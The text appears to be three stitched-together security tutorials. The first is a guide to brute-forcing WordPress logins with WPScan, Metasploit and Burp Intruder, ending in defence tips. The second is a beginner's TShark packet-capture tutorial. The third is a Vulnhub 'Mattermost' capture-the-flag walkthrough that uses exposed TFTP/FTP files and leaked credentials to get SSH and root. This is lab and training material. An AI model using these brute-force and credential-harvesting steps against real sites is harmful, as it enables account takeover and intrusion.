Multiple Ways to Crack on WordPress login

In this article, you will be learning how to compromise a WordPress website’s credentials using different brute forcing techniques.

Table of Content

·         Pre-requisites

·         WPscan

·         Metasploit

·         Burp Suite

·         How to avoid a Brute Force Attack?

Pre-requisites:

Target: WordPress 

Attacker: Kali Linux (WPscan)

                    Burp Suite (Intruder)

WPscan

WPscan is a command line tool which is used as a black box vulnerability scanner. It is commonly used by security professionals and bloggers to test the security of their website. WPscan comes pre-installed on the most security-based Linux distributions and it is also available as a plug-in.

Here, I am using a WordPress website hosted on localhost as you can see in image given below

While brute forcing you can either use your own common username and password lists or the ones provided with kali Linux. I have used rockyou.txt password file which comes with kali standard installation and contains 14341564 unique passwords.

wpscan –url http://192.168.1.100/wordpress/ -U users.txt -P /usr/share/wordlists/rockyou.txt

 –url  is url parameter, followed by url of the wordpress website to be scanned

-U will only bruteforce the supplied usernames, in our case it is users.txt

-P will bruteforce the passwords from the provided list rockyou.txt

The scan duration mainly depends on how large the password dictionary file is and as we are mapping  a large number of users with even larger numbers of passwords it could also impact the websites performance if left running for a long  time.

The screen shows the attack as a success with the username as admin and password as flower.

Metasploit

As we know Metasploit comes preinstalled with Kali Linux, so our first step is to get to the Metasploit console and then run WordPress module used below.

This msf module will run a username and password audit. It will first validate usernames and then map passwords with them.  

msf > use auxiliary/scanner/http/wordpress_login_enum

msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.100

msf auxiliary(wordpress_login_enum) > set targeturi /wordpress

msf auxiliary(wordpress_login_enum) > set user_file user.txt

msf auxiliary(wordpress_login_enum) > set pass_file /pass.txt

msf auxiliary(wordpress_login_enum) > exploit

Yet again successful brute force login with credentials “Admin and flower” can be seen in following screenshot.

Burp Suite

For this install Burp suite community edition or use the one you get pre-installed in kali Linux. Fire up Burp suite and open WordPress login page then turn on intercept tab in Burp Proxy, next supply any username and password of your choice to login into the wordpress website. This will intercept the response of current request.

Look at image below and notice the last line of intercepted message, it shows the captured login credentials as raj:raj which I used to login as username and password respectively. Next Send the captured message to the intruder by right clicking the blank message space and choosing Send to Intruder option or by just pressing ctrl + I. If you are not familiar with burp Intruder working go through this article first ( https://www.hackingarticles.in/beginners-guide-burpsuite-payloads-part-1/ )

Now open the Intruder tab and you can see the base template request that we sent here. Select Positions tab, here by default multiple positions are selected, these positions are marked using § characters. Anything between two § characters is replaced by a payload. But we don’t need them all right now so click on clear button at right bottom corner of editor window.

Next select the positions as shown in screenshot and click on add button to the right of frame. This will configure these two selected positions as payload insertion points. Now to customize the attack select the attack type. As we are having 2 payload positions, I am choosing cluster bomb (This attack type is useful for a brute-force attack as It puts the first payload in the first position, and the second payload in the second position. But when it loops through the payload sets, it tries all combinations. For example, if you have 1000 user names and 1000 passwords, this will perform 1000000 requests.)

Now hit up the start attack button.

In payloads tab, click on payload set drop down, here you can see numbers 1 and 2. Select number 1 for first payload position. Choose simple list from payload type, this list lets you configure a simple list of strings that are used as payloads. you can manually add items to the list using the text box and the Add button, or you can paste a list from the clipboard, or load from file.

Similarly select number 2 for another payload position and select runtime file from payload type, this is useful when a very large list of payloads is needed, to avoid holding the entire list in memory. Add path of any dictionary file having password only. Click on start attack.

It will match the combination of both payloads and would try to login in with username and password as you can see below. By paying attention to the status and length of the payloads you can see login credentials admin and flower are having status as 302 and length as 1203 which is different than all other combinations indicating these are the results we are looking for. Hence username and password are admin and flower respectively

How to avoid a Brute Force attack?

One can certainly avoid these attacks using some precautionary measures as following:

Password Length: An ideal length should be 8-16 characters long for passwords. It's important to avoid the most common passwords and to change them frequently                          

Password Complexity: A password should consist of UPPERCASE and lowercase alphabets and should also include

numbers and special characters. Users should choose complex passphrases rather than single words; complexity of the password delays the cracking process.

                       

Limit Login Attempts: Limit the login attempts on your WordPress admin. For example, after three failed login attempts; it should block that particular IP for a certain period of time to stop it for making further login attempts.

Two Factor Authentication: The next way to be secure from brute forcing is two-factor authentication, or 2FA. This is a process that gives web services secondary access to the account owner in order to verify a login attempt. Generally, this involves a phone number and/or an email address.

Using Captcha: Installing captcha in your WordPress site is fairly easy and they help to prevent bots from executing automated scripts to login into your account.

Install a WordPress Firewall Plugin: Even the unsuccessful brute force attacks can slow down your website or completely crash the server. This is why it’s important to block them and to do that, you’ll need a website firewall solution. A firewall filters out bad traffic and blocks it from accessing your site.

Cloudflare: It is a renowned service to provide a protective shield against brute force attacks

Install and Setup a WordPress Backup Plugin: If everything fails, one must have a backup plan!

There are several great WordPress backup plugins, which allow you to schedule automatic backups.

Disabling Directory Browsing and Installing WordPress Updates regularly can also help to be safe from brute forcing attacks against a WordPress website.

Thank you!   

Beginners Guide to TShark (Part 1)

In this article, we will learn about TShark which is a well-known network protocol analyzer. It lets us capture the data packets, from the live network. It also allows us, to read or analyze the previously captured data packets of a saved file.

Table of content

·         Network traffic

·         Introduction to TShark

·         List interfaces

·         Capture traffic

·         Capture the interface in promiscuous mode

·         Capture the packet count

·         Read and Write in a file

·         Verbose mode

·         Output Formats

·         Difference between decoded packets and encoded packets

·         Converting PDML file HTML page

·         Capturing packets of a particular port

·         Display filter

Network traffic

As we know, network traffic or data traffic is the amount of data transferring across the network at some given point of time. Network data, in computer networks, is in the form of network data packets. Analyzing these network packets provides network security as it helps us to monitor traffic. As a benefit, if there is some unusual amount of data traffic in a network which is a possible sign of an attack then Tshark can help us know before it too late and the attack can be terminated as data traffic reports provide insights into preventing some good attacks.

Traffic volume is a term which comes under network traffic analyzing. Network traffic volume is the measure of the total work done. It is defined as the average data traffic intensity and time period of its network data packet study.

Introduction to TShark

Tshark, a well known and powerful command-line tool and is used as a network analyzer. It is developed by Wireshark. It's working structure is quite similar to Tcpdump, but it has some powerful decoders and filters. TShark is capable of capturing the data packets information of different network layers and display them in different formats.

TShark is used to analyze real-time network traffic and it can read .pcap files to analyze the information, digg into the details of those connections, helping security professionals to identify their network problem.

TShark is command-line based tool, which can do anything that Wireshark does. So let us start our learning process with TShark and therefore launch this tool and explore its options. To check out all the parameters, use the following command :

tshark -h

List interfaces

TShark prints a list of the interfaces whose traffic it can capture. Each interface is refered to by their srial number and as you can see it is followed by a text description of the network interface. These interfaces can be specified using -i parameter; which is used to specify the network whose traffic we want to capture. And to check out these interfaces you can use the parameter -D as shown in the image below :

tshark -D

Capture traffic

Let’s now try to capture traffic, we have various choice of interface to capture traffic and therefore one can choose which ever depending ont heir need and requirement. But in our scenario, the interface which we are going to use is “eth0”. In order to capture traffic, we need to initiate one too as we are testing on a controlled network and for that use ping command and then to capture traffic we have to just specify t he interface name by using -i parameter as shown in the image below :

ping www.hackingarticles.in

tshark -i eth0

As we can clearly see it is performing its three-way handshake, then starts the process of ICMP request and reply.

Promiscuous mode

In the networking, promiscuous mode is used as an interface controller that causes tshark to pass all the traffic it receives to the CPU rather than passing the frames to the The promiscuous mode is normally used for packet sniffing that can take place on a router or on a computer connected to a wired network or a part of LAN.

When using this mode, wew will need to configure it with the help of ifconfig so that it  let us capture the data pakets of the whole network. Therefoe, we will start by pinging a website and try to capture its data packets.

Now, configure the promiscuous mode by following these commands and try to capture the packets :

ifconfig eth0 promisc

tshark -i eth0

Packet count

Tshark has amazing features with which we can work more efficiently and we can access these features using various parametersr. One of such parameter is ‘-c’, it lets us capture the exact amount of data that we require and it will display only those. This option helps us to refine the outcome of captured traffic.

tshark -i eth0 -c 10

As we can  clearly see in the image above that it stops after the 10 counts.

Read and Write in a file

In Tshark we can write and read into .pcap file. Write option (-w) allows us to write raw packet data output to a standard .pcap file where as read option (-r) help us to read that raw output data packets in our desired manner. To write the packets into a .pcap file use the following command :

tshark -i eth0 -c 10 -w packets.pcap

And to read the said .pcap file use the following command :

tshark -r packets.pcap

Verbose mode

The verbose mode provides us with additional details of a packet in traffic. Using the verbose mode, we can see information that each packet contains and for this option we can use the parameter -V.

tshark -r packets.pcap -V

Output formats

For our convenience, in tshark, we have -T optionthat lets us save decoded packets in various output formats. It can set the format of the output in the way that it becomes easy to understand. To see all the available options type the following command :

tshark -T x

PDML

PDML stands for Packet Details Mark-Up Language which is an XML based. This information is quite equivalent to the verbose mode which we used earlier. And to have output in this format type the following command :

tshark -r packets.pcap -T pdml

PS

PS stands for PostScript. This output is in a form of oneliner summary of each data packets or multi-line detail view of each data packets depending upon each data packet specification. These one liners are very quick to understand as well as reliable. For this, use the following command :

tshark -r packets.pcap -T ps

PSML

PSML stands for Packet Summary Mark-Up Language. It is also an XML based format like PDML which summarises the detailed information of the  packets. And for this format type :

tshark -r packets.pcap -T psml

JSON

JSON stands for Java-Script Object Notation. It is an open standard file format that display text in readable form. The information in this format is fully documented and referred at wolfram. To see that packets in this format, type :

tshark -r packets.pcap -T json

EK

It is newline delimited json format function for bulk import into elastic search option. And for this format use the following command :

tshark -r packets.pcap -T ek

Text

Text is a human-readable one lines summary of each of the packets. This is the most simplest of the formats. And for this, use the following command :

tshark -r packets.pcap -T text

Tabs

This option is quite similar to text except, it includes an ASCII horizontal tab (oxo9) character as the delimiter between each column. To try this, type :

tshark -r packets.pcap -T tabs

Difference between decoded packets and encoded packets

When we try to write the live data packets in a .pcap format file; we compress all that data packets in smaller segments. To better understand these data packets we need to decode them which leads to difference in the size of the file and to check the size of any given file at given moment use the following command :

ls -lh packets.p*

Like we discussed there is a huge difference in these files, that’s why we use decoding techniques to extract this information.

Converting PDML file HTML page

The only difference between the Wireshark and tshark is that Wireshark is a GUI based tool and tshark is command-line based tool. But with the help of some external source, we can also view our data packets in HTML. So to achieve that first, we need to save our data packets in PDML format and then convert it into XML file using the following command :

tshark -r packets.pcap -T pdml > packets.xml

The xml file will be saved at location /usr/share/wireshark/pdml2html.xsl. So, we are going to use xsltproc tool to execute this file it which will help us to create our HTML page. Creating the HTML page will format all the unnecessary information and only let us view the usable data. To create the HTML use following command :

xsltproc /usr/share/wireshark/pdml2html.xsl packets.xml > packets.html

to open the HTML page in the browser, refer to the above image and use the following command :

firefox packets.html &

Capturing packets of a particular port

A lot of times we use wireshark on a dedicated port. And by using the -f option we can capture data packets of a particular port. It help us to better analyze the data packets of the network. We are using this feature to capture TCP port 80 and the command for this is :

tshark -i eth0 -c 5 -f “tcp port 80”

Display filter

Display filter was introduced by Wireshark. It helps us to filter the captured data packets or live data packets. With the help of this filter, we can request for any kind of filter that we want to capture in the live environment.

In our scenario, we apply the GET request filter to capture only GET request from the traffic and for, use the following command :

tshark -i eth0 -c 5 -f “tcp port 80” -Y 'http.request.method == "GET" '

Conclusion

This article focuses on the basic commands and functionality of tshark as it is the first article in the series. So get yourself familiar with the features of it as and stay tune for the advance features of tshark in our next article.

Author: Shubham Sharma is a Pentester, Cybersecurity Researcher and Enthusiast, contact here.

EnuBox: Mattermost: Vulnhub Walkthrough

In this article, we are going to crack the EnuBox: Mattermost Boot to Root Challenge and present a detailed walkthrough. The machine depicted in this Walkthrough is hosted on Vulnhub. Credit for making this machine goes to Avraham Cohen. Download this lab by clicking here.

Penetration Testing Methodology

·         Network Scanning

o   Netdiscover Scan

o   Nmap Scan

·         Enumeration

o   Browsing HTTP Service

·         Exploitation

o   Connection via SSH

·         Post Exploitation

o   s

·         Reading Root Flag

Walkthrough

Network Scanning

We downloaded, imported and ran the virtual machine (.ova file) on the VMWare Workstation, the machine will automatically be assigned an IP address from the network DHCP. To begin we will find the IP address of our target machine, for that use the following command as it helps to see all the IP’s in an internal network:

netdiscover

We found the target’s IP Address 192.168.1.8. The next step is to scan the target machine by using the Nmap tool. This is to find the open ports and services on the target machine and will help us to proceed further

nmap -sT -sU -A 192.168.0.110

Here, we performed a nmap scan with TCP and UDP parameters. After the scan, we saw that port 22,80, 3389, 68, 69, 631, 5353. From the scan we have the FTP (21) service, SSH (22) Service, HTTP (80), DHCPC (68) service, TFTP (69) service, and some other services. This was the lay of the land. Now let’s get to enumeration.

Enumeration

We started from port 80 and tried to browse the webpage on our browser. We have the classic Access Forbidden Banner. Although this is a custom error page but some sensitive information disclosure is active here. We see that through the error, there is the Server OS Version Disclosure. We also have the name of a probably sensitive file named README.md. Let’s take a note these might be useful down the lane.

http://192.168.0.110

Now moving on, we also got another page hosted on the port 8065. Let’s take a look at that. We see that we have a login panel. So, this is probably our way in to the CMS.

http://192.168.0.110:8065/login

From the Nmap scan we see that we have the TFTP service running on the Target Machine. Let’s take a look onto that. As Anonymous Login was enabled, no credentials were asked. In the earlier stage we know that there is a sensitive file named “README.md”. We tried to download this file from this TFTP Server. Our download was successful. After downloading the file, we read the file contents to find the Username and Password.

tftp 192.168.0.110

get README.md

quit

cat README.md

We went back to the Login Panel that we found earlier and entered the following credentials.

Username: admin

Password: ComplexPassword0!

After logging in the application, we see that there are bunch of posts on the main page. On reading those posts we see that there was different version of the word “zoom” word used. It was quite peculiar the way it was used. Like “Let’s zoom”, “Zoom me”. It was very similar to the terminology that we commonly use with the word “text/chat”. Like “Let’s Text”, “Text me”. This gave us some idea that this was some kind of messaging module. Now from the look of the CMS, it was clear that the CMS uses the plugin methods to add or remove functionalities. So we set on the mission to find the plugin by the name “zoom”.

To edit some plugins, we move to the panel with the Username on the left side. We click on the Menu button; it gave us the dropdown menu. Among a bunch of other options, we have the “System Console” Option. It’s worth checking out.

Now we have the System Console, we found of bunch of option, but my search was focused on finding the Plugins panel. Here under the System Console Panel we have the Plugin Option in the System Console Panel. In the plugin panel we have the Zoom Plugin.  

Clicking on the Zoom Plugin button which will open a plugin config page. The plugin was disabled by default. As we are the admin, so we have the authority for to enable to the plugin. After enabling, we see that we have ourselves an URL for the plugin. As it says localhost because the application is configured server-side. We change the localhost to the IP Address of the Machine.

After making appropriate changes in the URL, we browse that link to see that we have a message. It says that FTP credentials help the admin, edit and manage the files. This gives us the FTP Credentials:

Username: ftpuser

Password: ftppassword

Let’s login in the machine using these FTP Credentials. We use the dir command to list all the files inside the machine. We do some enumeration to find a file named message.

ftp 192.168.0.110

ftpuser

ftppassword

dir

cd users

dir

cd mattermost

dir

get message

bye

Exploitation

Let’s take a look at the message file from the FTP server. It says “Welcome!!”.

After thinking and tinkering with the application we figured out that the password for the SSH user is the text that was inside the message file. We SSHed  in to the machine using the following credentials. After successful login, we start enumeration process by listing the directories. We see that we have a README.md file and a binary named secret. We view the README file to find that the there is a secret key which is used to traverse further. We ran the secret binary, it asked for the secret key. We entered the key which we found inside the README file. But we are shown an error that the key is expired.

Username: mattermost

Password: Welcome!!

cat message

ssh mattermost@192.168.0.110

ls

cd Desktop/

ls

cat README.md

./secret

Post Explitation

 We thought we have to reverse engineer the secret script to get ourselves a key. To do that we download the file to our system using the PHP server script.

pwd

php -S 0.0.0.0:8080

After hosting the file on the server, we download it onto out attacker machine using the wget command.

wget http://192.168.0.110:8080/secret

ls

Privilege Escalation

Now we used the Ghidra to Decompile the code and see the value of the variable that is compared the value of the secret key. We see that whatever the value we enter for the secret key is compared to 0xf447. Now all we need is to find the decimal equivalent of the number.

We used the echo command to convert the value we found inside the secret binary into a decimal value. We have the value of the secret key: “62535”

echo $((0xf447))

Now that we have the value of the secret key, we went back to our SSH Session and ran the secret binary. We entered the value and the shell gets elevated to root privileges.

Reading the Flag

We enumerated the Desktop of the root user and found a text file named local.txt. Upon opening we see that it is the final flag of this machine.

./secret

62535

whoami

cd /root/Desktop

cat local.txt

This concludes the lab. A huge shout out to the lab author for creating this lab. From the look of it, the lab must have taken some effort and time. I would like to thank the author for investing his/her resources for my learning.